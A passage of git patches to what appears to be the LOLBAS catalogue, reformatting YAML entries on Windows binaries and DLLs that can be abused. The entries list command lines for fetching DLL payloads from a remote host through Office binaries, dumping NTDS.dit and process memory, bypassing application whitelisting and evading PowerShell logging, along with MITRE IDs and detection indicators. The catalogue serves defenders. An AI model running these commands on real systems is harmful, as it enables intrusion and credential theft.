Name: Bginfo.exe Description: Background Information Utility included with SysInternals Suite Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: bginfo.exe bginfo.bgi /popup /nolicprompt Description: Execute VBscript code that is referenced within the bginfo.bgi file. diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index 2411a0d..0183c57 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -2,7 +2,7 @@ Name: Cdb.exe Description: Debugging tool included with Windows Debugging Tools. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: cdb.exe -cf x64_calc.wds -o notepad.exe Description: Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe. @@ -26,4 +26,4 @@ Resources: Acknoledgement: - Person: Matt Graeber Handle: '@mattifestation' ---- \ No newline at end of file +--- diff --git a/yml/OtherMSBinaries/Csi.yml b/yml/OtherMSBinaries/Csi.yml index 46a5ea7..d43f486 100644 --- a/yml/OtherMSBinaries/Csi.yml +++ b/yml/OtherMSBinaries/Csi.yml @@ -2,7 +2,7 @@ Name: csi.exe Description: Command line interface included with Visual Studio. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: csi.exe file Description: Use csi.exe to run unsigned C# code. diff --git a/yml/OtherMSBinaries/DefaultPack.yml b/yml/OtherMSBinaries/DefaultPack.yml index dbea4fd..7c3d2fb 100644 --- a/yml/OtherMSBinaries/DefaultPack.yml +++ b/yml/OtherMSBinaries/DefaultPack.yml @@ -2,7 +2,7 @@ Name: DefaultPack.EXE Description: This binary can be downloaded along side multiple software downloads on the microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider. Author: '@checkymander' -Created: '2020-10-01' +Created: 2020-10-01 Commands: - Command: DefaultPack.EXE /C:"process.exe args" Description: Use DefaultPack.EXE to execute arbitrary binaries, with added argument support. @@ -14,9 +14,9 @@ Commands: OperatingSystem: Windows Full_Path: - Path: C:\Program Files (x86)\Microsoft\DefaultPack\ -Code_Sample: +Code_Sample: - Code: -Detection: +Detection: - IOC: DefaultPack.EXE spawned an unknown process Resources: - Link: https://twitter.com/checkymander/status/1311509470275604480. diff --git a/yml/OtherMSBinaries/Devtoolslauncher.yml b/yml/OtherMSBinaries/Devtoolslauncher.yml index 5661204..e92c543 100644 --- a/yml/OtherMSBinaries/Devtoolslauncher.yml +++ b/yml/OtherMSBinaries/Devtoolslauncher.yml @@ -2,7 +2,7 @@ Name: Devtoolslauncher.exe Description: Binary will execute specified binary. Part of VS/VScode installation. Author: 'felamos' -Created: '2019-10-04' +Created: 2019-10-04 Commands: - Command: devtoolslauncher.exe LaunchForDeploy [PATH_TO_BIN] "argument here" test Description: The above binary will execute other binary. @@ -24,7 +24,7 @@ Full_Path: - Path: 'c:\windows\system32\devtoolslauncher.exe' Code_Sample: - Code: -Detection: +Detection: - IOC: DeveloperToolsSvc.exe spawned an unknown process Resources: - Link: https://twitter.com/_felamos/status/1179811992841797632 diff --git a/yml/OtherMSBinaries/Dnx.yml b/yml/OtherMSBinaries/Dnx.yml index b133a8a..9b7d9a4 100644 --- a/yml/OtherMSBinaries/Dnx.yml +++ b/yml/OtherMSBinaries/Dnx.yml @@ -2,7 +2,7 @@ Name: dnx.exe Description: .Net Execution environment file included with .Net. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: dnx.exe consoleapp Description: Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies) @@ -23,4 +23,4 @@ Resources: Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' ---- \ No newline at end of file +--- diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml index 59e1f31..cd3d41d 100644 --- a/yml/OtherMSBinaries/Dotnet.yml +++ b/yml/OtherMSBinaries/Dotnet.yml @@ -2,7 +2,7 @@ Name: Dotnet.exe Description: dotnet.exe comes with .NET Framework Author: 'felamos' -Created: '2019-11-12' +Created: 2019-11-12 Commands: - Command: dotnet.exe [PATH_TO_DLL] Description: dotnet.exe will execute any dll even if applocker is enabled. @@ -28,7 +28,7 @@ Commands: OperatingSystem: Windows 10 with .NET Core installed Full_Path: - Path: 'C:\Program Files\dotnet\dotnet.exe' -Detection: +Detection: - IOC: dotnet.exe spawned an unknown process Resources: - Link: https://twitter.com/_felamos/status/1204705548668555264 @@ -38,5 +38,5 @@ Acknowledgement: - Person: felamos Handle: '@_felamos' - Person: Jimmy - Handle: '@bohops' + Handle: '@bohops' --- diff --git a/yml/OtherMSBinaries/Dxcap.yml b/yml/OtherMSBinaries/Dxcap.yml index ef13851..a7b5048 100644 --- a/yml/OtherMSBinaries/Dxcap.yml +++ b/yml/OtherMSBinaries/Dxcap.yml @@ -1,8 +1,8 @@ --- Name: Dxcap.exe -Description: DirectX diagnostics/debugger included with Visual Studio. +Description: DirectX diagnostics/debugger included with Visual Studio. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Dxcap.exe -c C:\Windows\System32\notepad.exe Description: Launch notepad as a subprocess of Dxcap.exe @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Matt harr0ey Handle: '@harr0ey' ---- \ No newline at end of file +--- diff --git a/yml/OtherMSBinaries/Excel.yml b/yml/OtherMSBinaries/Excel.yml index 6aba87a..6e569b1 100644 --- a/yml/OtherMSBinaries/Excel.yml +++ b/yml/OtherMSBinaries/Excel.yml @@ -2,7 +2,7 @@ Name: Excel.exe Description: Microsoft Office binary Author: 'Reegun J (OCBC Bank)' -Created: '2019-07-19' +Created: 2019-07-19 Commands: - Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll Description: Downloads payload from remote server @@ -38,4 +38,4 @@ Resources: Acknowledgement: - Person: 'Reegun J (OCBC Bank)' Handle: '@reegun21' ---- \ No newline at end of file +--- diff --git a/yml/OtherMSBinaries/Mftrace.yml b/yml/OtherMSBinaries/Mftrace.yml index 6cda996..88f65dc 100644 --- a/yml/OtherMSBinaries/Mftrace.yml +++ b/yml/OtherMSBinaries/Mftrace.yml @@ -2,7 +2,7 @@ Name: Mftrace.exe Description: Trace log generation tool for Media Foundation Tools. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Mftrace.exe cmd.exe Description: Launch cmd.exe as a subprocess of Mftrace.exe. diff --git a/yml/OtherMSBinaries/Msdeploy.yml b/yml/OtherMSBinaries/Msdeploy.yml index dabf992..029d30e 100644 --- a/yml/OtherMSBinaries/Msdeploy.yml +++ b/yml/OtherMSBinaries/Msdeploy.yml @@ -2,7 +2,7 @@ Name: Msdeploy.exe Description: Microsoft tool used to deploy Web Applications. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat" Description: Launch calc.bat via msdeploy.exe. diff --git a/yml/OtherMSBinaries/Msxsl.yml b/yml/OtherMSBinaries/Msxsl.yml index c11ad9f..e90152c 100644 --- a/yml/OtherMSBinaries/Msxsl.yml +++ b/yml/OtherMSBinaries/Msxsl.yml @@ -2,7 +2,7 @@ Name: msxsl.exe Description: Command line utility used to perform XSL transformations. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: msxsl.exe customers.xml script.xsl Description: Run COM Scriptlet code within the script.xsl file (local). diff --git a/yml/OtherMSBinaries/Ntdsutil.yml b/yml/OtherMSBinaries/Ntdsutil.yml index f9ae0f5..4269b8e 100644 --- a/yml/OtherMSBinaries/Ntdsutil.yml +++ b/yml/OtherMSBinaries/Ntdsutil.yml @@ -2,7 +2,7 @@ Name: ntdsutil.exe Description: Command line utility used to export Actove Directory. Author: 'Tony Lambert' -Created: '2020-01-10' +Created: 2020-01-10 Commands: - Command: ntdsutil.exe "ac i ntds" "ifm" "create full c:\" q q Description: Dump NTDS.dit into folder @@ -23,4 +23,4 @@ Resources: Acknowledgement: - Person: Sean Metcalf Handle: '@PyroTek3' ---- \ No newline at end of file +--- diff --git a/yml/OtherMSBinaries/Powerpnt.yml b/yml/OtherMSBinaries/Powerpnt.yml index ea1151a..d3684b7 100644 --- a/yml/OtherMSBinaries/Powerpnt.yml +++ b/yml/OtherMSBinaries/Powerpnt.yml @@ -2,7 +2,7 @@ Name: Powerpnt.exe Description: Microsoft Office binary. Author: 'Reegun J (OCBC Bank)' -Created: '2019-07-19' +Created: 2019-07-19 Commands: - Command: Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll" Description: Downloads payload from remote server @@ -34,4 +34,4 @@ Resources: Acknowledgement: - Person: Reegun J (OCBC Bank) Handle: '@reegun21' ---- \ No newline at end of file +--- diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml index cb2b30c..0c266ec 100644 --- a/yml/OtherMSBinaries/Rcsi.yml +++ b/yml/OtherMSBinaries/Rcsi.yml @@ -2,7 +2,7 @@ Name: rcsi.exe Description: Non-Interactive command line inerface included with Visual Studio. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rcsi.exe bypass.csx Description: Use embedded C# within the csx script to execute the code. diff --git a/yml/OtherMSBinaries/Sqldumper.yml b/yml/OtherMSBinaries/Sqldumper.yml index 723ec9d..830109a 100644 --- a/yml/OtherMSBinaries/Sqldumper.yml +++ b/yml/OtherMSBinaries/Sqldumper.yml @@ -2,7 +2,7 @@ Name: Sqldumper.exe Description: Debugging utility included with Microsoft SQL. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: sqldumper.exe 464 0 0x0110 Description: Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp). diff --git a/yml/OtherMSBinaries/Sqlps.yml b/yml/OtherMSBinaries/Sqlps.yml index a6cc7b3..c0dce3f 100644 --- a/yml/OtherMSBinaries/Sqlps.yml +++ b/yml/OtherMSBinaries/Sqlps.yml @@ -2,7 +2,7 @@ Name: Sqlps.exe Description: Tool included with Microsoft SQL Server that loads SQL Server cmdlets. Microsoft SQL Server\100 and 110 are Powershell v2. Microsoft SQL Server\120 and 130 are Powershell version 4. Replaced by SQLToolsPS.exe in SQL Server 2016, but will be included with installation for compatability reasons. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Sqlps.exe -noprofile Description: Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging. diff --git a/yml/OtherMSBinaries/Sqltoolsps.yml b/yml/OtherMSBinaries/Sqltoolsps.yml index 3963cce..562ddfc 100644 --- a/yml/OtherMSBinaries/Sqltoolsps.yml +++ b/yml/OtherMSBinaries/Sqltoolsps.yml @@ -2,7 +2,7 @@ Name: SQLToolsPS.exe Description: Tool included with Microsoft SQL that loads SQL Server cmdlts. A replacement for sqlps.exe. Successor to sqlps.exe in SQL Server 2016+. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe Description: Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging. @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- \ No newline at end of file +--- diff --git a/yml/OtherMSBinaries/Squirrel.yml b/yml/OtherMSBinaries/Squirrel.yml index 64c0737..b0b6528 100644 --- a/yml/OtherMSBinaries/Squirrel.yml +++ b/yml/OtherMSBinaries/Squirrel.yml @@ -2,14 +2,14 @@ Name: Squirrel.exe Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation. Author: 'Reegun J (OCBC Bank) - @reegun21' -Created: '2019-06-26' +Created: 2019-06-26 Commands: - Command: squirrel.exe --download [url to package] Description: The above binary will go to url and look for RELEASES file and download the nuget package. Usecase: Download binary Category: Download Privileges: User - MitreID: T1218 + MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ OperatingSystem: Windows 7 and up with Microsoft Teams installed - Command: squirrel.exe --update [url to package] @@ -46,9 +46,9 @@ Commands: OperatingSystem: Windows 7 and up with Microsoft Teams installed Full_Path: - Path: '%localappdata%\Microsoft\Teams\current\Squirrel.exe' -Code_Sample: +Code_Sample: - Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel -Detection: +Detection: - IOC: Update.exe spawned an unknown process Resources: - Link: https://www.youtube.com/watch?v=rOP3hnkj7ls diff --git a/yml/OtherMSBinaries/Te.yml b/yml/OtherMSBinaries/Te.yml index b16704d..5b158f7 100644 --- a/yml/OtherMSBinaries/Te.yml +++ b/yml/OtherMSBinaries/Te.yml @@ -2,7 +2,7 @@ Name: te.exe Description: Testing tool included with Microsoft Test Authoring and Execution Framework (TAEF). Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: te.exe bypass.wsc Description: Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file. diff --git a/yml/OtherMSBinaries/Tracker.yml b/yml/OtherMSBinaries/Tracker.yml index f7902a4..e0c4fc2 100644 --- a/yml/OtherMSBinaries/Tracker.yml +++ b/yml/OtherMSBinaries/Tracker.yml @@ -2,7 +2,7 @@ Name: Tracker.exe Description: Tool included with Microsoft .Net Framework. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml index 5195cf0..49809c5 100644 --- a/yml/OtherMSBinaries/Update.yml +++ b/yml/OtherMSBinaries/Update.yml @@ -2,14 +2,14 @@ Name: Update.exe Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation. Author: 'Oddvar Moe' -Created: '2019-06-26' +Created: 2019-06-26 Commands: - Command: Update.exe --download [url to package] Description: The above binary will go to url and look for RELEASES file and download the nuget package. Usecase: Download binary Category: Download Privileges: User - MitreID: T1218 + MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ OperatingSystem: Windows 7 and up with Microsoft Teams installed - Command: Update.exe --update=[url to package] @@ -94,9 +94,9 @@ Commands: OperatingSystem: Windows 7 and up with Microsoft Teams installed Full_Path: - Path: '%localappdata%\Microsoft\Teams\update.exe' -Code_Sample: +Code_Sample: - Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel -Detection: +Detection: - IOC: Update.exe spawned an unknown process Resources: - Link: https://www.youtube.com/watch?v=rOP3hnkj7ls diff --git a/yml/OtherMSBinaries/Vsjitdebugger.yml b/yml/OtherMSBinaries/Vsjitdebugger.yml index e0be905..3dd820a 100644 --- a/yml/OtherMSBinaries/Vsjitdebugger.yml +++ b/yml/OtherMSBinaries/Vsjitdebugger.yml @@ -2,7 +2,7 @@ Name: vsjitdebugger.exe Description: Just-In-Time (JIT) debugger included with Visual Studio Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Vsjitdebugger.exe calc.exe Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe. @@ -17,7 +17,7 @@ Full_Path: Code_Sample: - Code: Detection: - - IOC: + - IOC: Resources: - Link: https://twitter.com/pabraeken/status/990758590020452353 Acknowledgement: diff --git a/yml/OtherMSBinaries/Winword.yml b/yml/OtherMSBinaries/Winword.yml index b39a89f..86ac6a0 100644 --- a/yml/OtherMSBinaries/Winword.yml +++ b/yml/OtherMSBinaries/Winword.yml @@ -2,7 +2,7 @@ Name: Winword.exe Description: Microsoft Office binary Author: 'Reegun J (OCBC Bank)' -Created: '2019-07-19' +Created: 2019-07-19 Commands: - Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll" Description: Downloads payload from remote server @@ -38,4 +38,4 @@ Resources: Acknowledgement: - Person: 'Reegun J (OCBC Bank)' Handle: '@reegun21' ---- \ No newline at end of file +--- diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml index 06b6384..70965c3 100644 --- a/yml/OtherMSBinaries/Wsl.yml +++ b/yml/OtherMSBinaries/Wsl.yml @@ -2,7 +2,7 @@ Name: Wsl.exe Description: Windows subsystem for Linux executable Author: 'Matthew Brown' -Created: '2019-06-27' +Created: 2019-06-27 Commands: - Command: wsl.exe -e /mnt/c/Windows/System32/calc.exe Description: Executes calc.exe from wsl.exe From 38f9a0a0325d0090b447c2a024ec38ed14bea412 Mon Sep 17 00:00:00 2001 From: Wietze Date: Sun, 10 Jan 2021 15:26:27 +0000 Subject: [PATCH 03/19] Fixed incorrect MItreLink --- yml/LOLUtilz/OtherMSBinaries/Winword.yml | 2 +- yml/OSLibraries/Advpack.yml | 134 +++++++++---------- yml/OSLibraries/Ieadvpack.yml | 128 +++++++++---------- yml/OSLibraries/Ieframe.yml | 66 +++++----- yml/OSLibraries/Mshtml.yml | 56 ++++---- yml/OSLibraries/Pcwutl.yml | 56 ++++---- yml/OSLibraries/Setupapi.yml | 92 ++++++------- yml/OSLibraries/Shdocvw.yml | 64 +++++----- yml/OSLibraries/Shell32.yml | 102 +++++++-------- yml/OSLibraries/Syssetup.yml | 88 ++++++------- yml/OSLibraries/Url.yml | 156 +++++++++++------------ yml/OSLibraries/Zipfldr.yml | 78 ++++++------ 12 files changed, 511 insertions(+), 511 deletions(-) diff --git a/yml/LOLUtilz/OtherMSBinaries/Winword.yml b/yml/LOLUtilz/OtherMSBinaries/Winword.yml index 579b05a..6befdb8 100644 --- a/yml/LOLUtilz/OtherMSBinaries/Winword.yml +++ b/yml/LOLUtilz/OtherMSBinaries/Winword.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - MItreLink: https://attack.mitre.org/wiki/Technique/T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full_Path: - Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index 86c8788..7d61259 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -1,67 +1,67 @@ ---- -Name: Advpack.dll -Description: Utility for installing software and drivers with rundll32.exe -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, - Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification. - Category: AWL Bypass - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1, - Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). - UseCase: Run local or remote script(let) code through INF file specification. - Category: AWL Bypass - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe advpack.dll,RegisterOCX test.dll - Description: Launch a DLL payload by calling the RegisterOCX function. - UseCase: Load a DLL payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe - Description: Launch an executable by calling the RegisterOCX function. - UseCase: Run an executable payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" - Description: Launch command line by calling the RegisterOCX function. - UseCase: Run an executable payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 -Full_Path: - - Path: c:\windows\system32\advpack.dll - - Path: c:\windows\syswow64\advpack.dll -Code_Sample: - - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf - - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct -Detection: - - IOC: -Resources: - - Link: https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/ - - Link: https://twitter.com/ItsReallyNick/status/967859147977850880 - - Link: https://twitter.com/bohops/status/974497123101179904 - - Link: https://twitter.com/moriarty_meng/status/977848311603380224 -Acknowledegment: - - Person: Jimmy (LaunchINFSection) - Handle: '@bohops' - - Person: Fabrizio (RegisterOCX - DLL) - Handle: '@0rbz_' - - Person: Moriarty (RegisterOCX - CMD) - Handle: '@moriarty_meng' - - Person: Nick Carr (Threat Intel) - Handle: '@ItsReallyNick' ---- +--- +Name: Advpack.dll +Description: Utility for installing software and drivers with rundll32.exe +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, + Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). + UseCase: Run local or remote script(let) code through INF file specification. + Category: AWL Bypass + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1, + Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). + UseCase: Run local or remote script(let) code through INF file specification. + Category: AWL Bypass + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe advpack.dll,RegisterOCX test.dll + Description: Launch a DLL payload by calling the RegisterOCX function. + UseCase: Load a DLL payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe + Description: Launch an executable by calling the RegisterOCX function. + UseCase: Run an executable payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" + Description: Launch command line by calling the RegisterOCX function. + UseCase: Run an executable payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 +Full_Path: + - Path: c:\windows\system32\advpack.dll + - Path: c:\windows\syswow64\advpack.dll +Code_Sample: + - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf + - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct +Detection: + - IOC: +Resources: + - Link: https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/ + - Link: https://twitter.com/ItsReallyNick/status/967859147977850880 + - Link: https://twitter.com/bohops/status/974497123101179904 + - Link: https://twitter.com/moriarty_meng/status/977848311603380224 +Acknowledegment: + - Person: Jimmy (LaunchINFSection) + Handle: '@bohops' + - Person: Fabrizio (RegisterOCX - DLL) + Handle: '@0rbz_' + - Person: Moriarty (RegisterOCX - CMD) + Handle: '@moriarty_meng' + - Person: Nick Carr (Threat Intel) + Handle: '@ItsReallyNick' +--- diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index 93492cd..ef48be6 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -1,64 +1,64 @@ ---- -Name: Ieadvpack.dll -Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll. -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, - Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification. - Category: AWL Bypass - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, - Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). - UseCase: Run local or remote script(let) code through INF file specification. - Category: AWL Bypass - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll - Description: Launch a DLL payload by calling the RegisterOCX function. - UseCase: Load a DLL payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe - Description: Launch an executable by calling the RegisterOCX function. - UseCase: Run an executable payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" - Description: Launch command line by calling the RegisterOCX function. - UseCase: Run an executable payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 -Full_Path: - - Path: c:\windows\system32\ieadvpack.dll - - Path: c:\windows\syswow64\ieadvpack.dll -Code_Sample: - - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack.inf - - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack_calc.sct -Detection: - - IOC: -Resources: - - Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ - - Link: https://twitter.com/pabraeken/status/991695411902599168 - - Link: https://twitter.com/0rbz_/status/974472392012689408 -Acknowledgement: - - Person: Jimmy (LaunchINFSection) - Handle: '@bohops' - - Person: Fabrizio (RegisterOCX - DLL) - Handle: '@0rbz_' - - Person: Pierre-Alexandre Braeken (RegisterOCX - CMD) - Handle: '@pabraeken' ---- +--- +Name: Ieadvpack.dll +Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll. +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, + Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). + UseCase: Run local or remote script(let) code through INF file specification. + Category: AWL Bypass + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, + Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). + UseCase: Run local or remote script(let) code through INF file specification. + Category: AWL Bypass + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll + Description: Launch a DLL payload by calling the RegisterOCX function. + UseCase: Load a DLL payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe + Description: Launch an executable by calling the RegisterOCX function. + UseCase: Run an executable payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" + Description: Launch command line by calling the RegisterOCX function. + UseCase: Run an executable payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 +Full_Path: + - Path: c:\windows\system32\ieadvpack.dll + - Path: c:\windows\syswow64\ieadvpack.dll +Code_Sample: + - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack.inf + - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack_calc.sct +Detection: + - IOC: +Resources: + - Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ + - Link: https://twitter.com/pabraeken/status/991695411902599168 + - Link: https://twitter.com/0rbz_/status/974472392012689408 +Acknowledgement: + - Person: Jimmy (LaunchINFSection) + Handle: '@bohops' + - Person: Fabrizio (RegisterOCX - DLL) + Handle: '@0rbz_' + - Person: Pierre-Alexandre Braeken (RegisterOCX - CMD) + Handle: '@pabraeken' +--- diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index ab4068c..19832be 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -1,33 +1,33 @@ ---- -Name: Ieaframe.dll -Description: Internet Browser DLL for translating HTML code. -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" - Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension 